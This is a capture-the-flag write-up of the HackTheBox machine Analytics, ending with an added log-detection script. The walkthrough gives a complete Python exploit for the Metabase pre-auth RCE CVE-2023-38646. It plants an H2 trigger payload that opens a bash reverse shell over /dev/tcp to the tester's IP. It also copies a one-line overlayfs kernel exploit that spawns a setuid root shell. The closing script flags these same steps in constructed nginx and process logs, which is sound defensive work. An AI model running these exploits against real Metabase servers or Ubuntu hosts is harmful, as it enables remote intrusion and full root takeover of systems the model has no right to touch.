Analytics

Analytics writeup by Thamizhiniyan C S

Overview

Greetings everyone,

In this write-up, we will tackle Analytics from HackTheBox.

Machine link: Analytics Machine

Difficulty Level: Easy

Let's Begin 🙌

Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB. Click Here to learn more about how to connect to VPN and access the boxes.

Once connected to the VPN service, click on "Join Machine" to access the machine's IP.

Upon joining the machine, you will be able to view the IP address of the target machine.


Reconnaissance

Rust Scan

rustscan --range=1-65535 --ulimit 5000 -a <TARGET_IP> -- -A -T4 -v -Pn

Results

Ports   Services   Service Version
22      SSH        OpenSSH 8.9p1
80      HTTP       nginx 1.18.0


Information Gathering - analytical.htb

First, let's take a look at the website running on port 80.

When attempting to access port 80, it redirects to the domain analytical.htb. Therefore, to access the website, we need to append an entry to the /etc/hosts file, mapping the domain to the target IP address.

Command: sudo vim /etc/hosts (add a line of the form <TARGET_IP> analytical.htb)

Now we have access to the website. I used Wappalyzer to check the technologies employed, but nothing of particular interest was discovered.

When I clicked the login button in the top right corner of the webpage, it redirected me to the subdomain data.analytical.htb. To access it, you need to append another entry to the /etc/hosts file.

Now, we can access the website. The website hosted on data.analytical.htb is a Metabase login page. Metabase is an open-source business intelligence tool that allows you to connect to many popular databases.

CVE-2023-38646

I began searching for recent exploits and vulnerabilities related to Metabase and came across this: https://www.assetnote.io/resources/research/chaining-our-way-to-pre-auth-rce-in-metabase-cve-2023-38646.

As mentioned in the article, I verified whether /api/session/properties is accessible, and indeed, it was.

Next, I searched for the setup-token in the /api/session/properties page. I copied the content of the page and pasted it into a JSON beautifier, where I located the setup-token. I utilized the following JSON beautifier website: https://codebeautify.org/jsonviewer.

Initial Access

The exposed setup-token indicates that the Metabase application is vulnerable to Remote Code Execution (RCE). I crafted a Python script based on the Proof of Concept (PoC) mentioned in the above article, along with references from other PoCs targeting the same vulnerability. The script retrieves the setup-token from the Metabase application and sends a POST request to /api/setup/validate to exploit the RCE, consequently establishing a reverse shell back to the attacker's machine.

import base64
from string import ascii_uppercase
import requests
import random

localhost = '10.10.16.10'  # HTB VPN TUNNEL IP

listening_port = '9001'  # Netcat listener port

response1 = requests.get("http://data.analytical.htb/api/session/properties")

setup_token = response1.json()['setup-token']

reverse_shell = f'bash -i >&/dev/tcp/{localhost}/{listening_port} 0>&1'

def encode_command_to_b64(payload: str) -> str:
    encoded_payload = base64.b64encode(payload.encode('ascii')).decode()
    equals_count = encoded_payload.count('=')

    if equals_count >= 1:
        encoded_payload = base64.b64encode(f'{payload + " " * equals_count}'.encode('ascii')).decode()

    return encoded_payload

command = encode_command_to_b64(reverse_shell)

url = f'http://data.analytical.htb/api/setup/validate'

headers = {
    "Content-Type": "application/json",
    "Connection": "close"
}

payload = {
    "token": setup_token,
    "details": {
        "details": {
            "db": "zip:/app/metabase.jar!/sample-database.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER {random_string} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {{echo,{command}}}|{{base64,-d}}|{{bash,-i}}')\n$$--=x".format(
                random_string=''.join(random.choice(ascii_uppercase) for i in range(12)), command=command),
            "advanced-options": False,
            "ssl": True
        },
        "name": "x",
        "engine": "h2"
    }
}

request = requests.post(url, json=payload, headers=headers)

Before executing the script, initiate a netcat listener on port 9001.

Now, execute the Python script and monitor the netcat listener. You will observe that you receive a connection back from the target machine. Upon further exploration of the machine, I discovered linpeas in the home directory. However, running it did not yield any privilege escalation vectors. Therefore, I continued searching for alternative avenues. I inspected the environment variables of the target machine, from which I obtained a username and password.

Since SSH is running on the target machine, I attempted to log in using the credentials we obtained, and to my satisfaction, it worked.

Getting the User Flag

Privilege Escalation

I tried all the usual privilege escalation vectors, but none of them worked. I proceeded to identify the kernel version as my next step in the investigation.

I began searching for exploits targeting the identified kernel version and came across this: https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629.

I examined the exploit.sh file in the mentioned repository. It contained a single line of code that performed the privilege escalation. I copied and executed that line; it is reproduced below:

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'

Getting the Root Flag

I executed the code, and to my satisfaction, it successfully completed the privilege escalation, granting me access to the root flag.
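Both stages of this box leave traces a defender can look for: the Metabase step shows up in the reverse proxy's access log as a POST to /api/setup/validate from a client that just fetched /api/session/properties, and the overlayfs step shows up in process auditing as an unprivileged user running unshare with a root-mapped user namespace (-r / --map-root-user), mounting overlayfs and calling setcap inside it. The script below is an added example of such detection logic and is not part of the original writeup or of the linked repositories. The nginx "combined" log lines, the simplified "uid=<uid> cmd=<command>" audit format, the client IPs and the rule names are all constructed for the example.

```python
import os
import re
import shlex
from dataclasses import dataclass

# Constructed sample data (not captured from the box): nginx "combined"
# access-log lines for the reverse proxy in front of Metabase.
ACCESS_LOG = """\
10.10.16.10 - - [02/Jan/2024:10:00:01 +0000] "GET /api/session/properties HTTP/1.1" 200 5123 "-" "python-requests/2.31.0"
10.10.16.10 - - [02/Jan/2024:10:00:02 +0000] "POST /api/setup/validate HTTP/1.1" 400 87 "-" "python-requests/2.31.0"
10.10.14.3 - - [02/Jan/2024:10:05:10 +0000] "GET /api/session/properties HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.3 - - [02/Jan/2024:10:05:11 +0000] "POST /api/session HTTP/1.1" 200 210 "-" "Mozilla/5.0"
"""

# Constructed sample data: one executed command per line, in the simplified
# "uid=<uid> cmd=<command line>" shape a process-audit collector might export.
COMMAND_LOG = """\
uid=1000 cmd=ls -la /tmp
uid=1000 cmd=unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/; setcap cap_setuid+eip l/python3; mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"
uid=1000 cmd=u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash -p")'
uid=0 cmd=mount -t overlay overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work /merged
"""

NGINX_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
COMMAND_RE = re.compile(r'^uid=(?P<uid>\d+) cmd=(?P<cmd>.*)$')


@dataclass
class Finding:
    rule: str       # hypothetical rule name chosen for this example
    actor: str      # client IP (web) or "uid=<n>" (host)
    evidence: str   # the raw log line that triggered the rule


def scan_access_log(text: str) -> list:
    """Flag POSTs to /api/setup/validate. Once initial setup of a Metabase
    instance is complete that endpoint should see no traffic; the
    CVE-2023-38646 chain drives it with the token read from
    /api/session/properties, so a client doing both in order is the
    stronger signal."""
    findings = []
    saw_properties = set()            # clients that fetched the properties endpoint
    for line in text.splitlines():
        m = NGINX_RE.match(line)
        if not m:
            continue
        path = m['path'].split('?', 1)[0]
        if path == '/api/session/properties':
            saw_properties.add(m['ip'])   # browsers fetch this too; not alone a finding
        elif m['method'] == 'POST' and path == '/api/setup/validate':
            rule = 'metabase-setup-validate-post'
            if m['ip'] in saw_properties:
                rule = 'metabase-token-then-setup-validate'
            findings.append(Finding(rule, m['ip'], line))
    return findings


def unshare_maps_root(cmd: str) -> bool:
    """True if the command runs unshare with the caller mapped to root in a
    new user namespace (-r in a short-option cluster, or --map-root-user)."""
    try:
        argv = shlex.split(cmd)
    except ValueError:                # unbalanced quotes: not parseable
        return False
    if not argv or os.path.basename(argv[0]) != 'unshare':
        return False
    for arg in argv[1:]:
        if arg == '--map-root-user':
            return True
        if arg.startswith('-') and not arg.startswith('--') and 'r' in arg:
            return True
        if not arg.startswith('-'):
            break                      # reached the program unshare executes
    return False


# Each rule: (name, predicate over the full command line). The overlayfs and
# setcap patterns are searched in the whole string because the writeup's
# one-liner hides them inside a quoted "sh -c" argument.
COMMAND_RULES = [
    ('userns-overlay-mount',
     lambda c: unshare_maps_root(c) and bool(re.search(r'\bmount\s+-t\s+overlay\b', c))),
    ('setcap-setuid-in-userns',
     lambda c: unshare_maps_root(c) and bool(re.search(r'\bsetcap\s+\S*cap_setuid', c))),
    ('python-setuid-0',
     lambda c: bool(re.search(r'\bos\.setuid\(\s*0\s*\)', c))),
]


def scan_command_log(text: str) -> list:
    """Apply COMMAND_RULES to every command executed by a non-root user."""
    findings = []
    for line in text.splitlines():
        m = COMMAND_RE.match(line)
        if not m or m['uid'] == '0':  # root mounting overlayfs is routine
            continue
        for name, matches in COMMAND_RULES:
            if matches(m['cmd']):
                findings.append(Finding(name, 'uid=' + m['uid'], line))
    return findings


if __name__ == '__main__':
    for f in scan_access_log(ACCESS_LOG) + scan_command_log(COMMAND_LOG):
        print(f'[{f.rule}] {f.actor}: {f.evidence[:90]}')
```

Run as-is it reports one web finding for 10.10.16.10 and three host findings for uid 1000; the root-owned overlayfs mount and the browser's own fetch of /api/session/properties are deliberately left unflagged, since both are normal on a healthy host. In a real deployment the web rule belongs on the proxy's logs (nginx on this box) and the command rules on an auditd or EDR process stream; the shape of the check stays the same.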

Thank You....
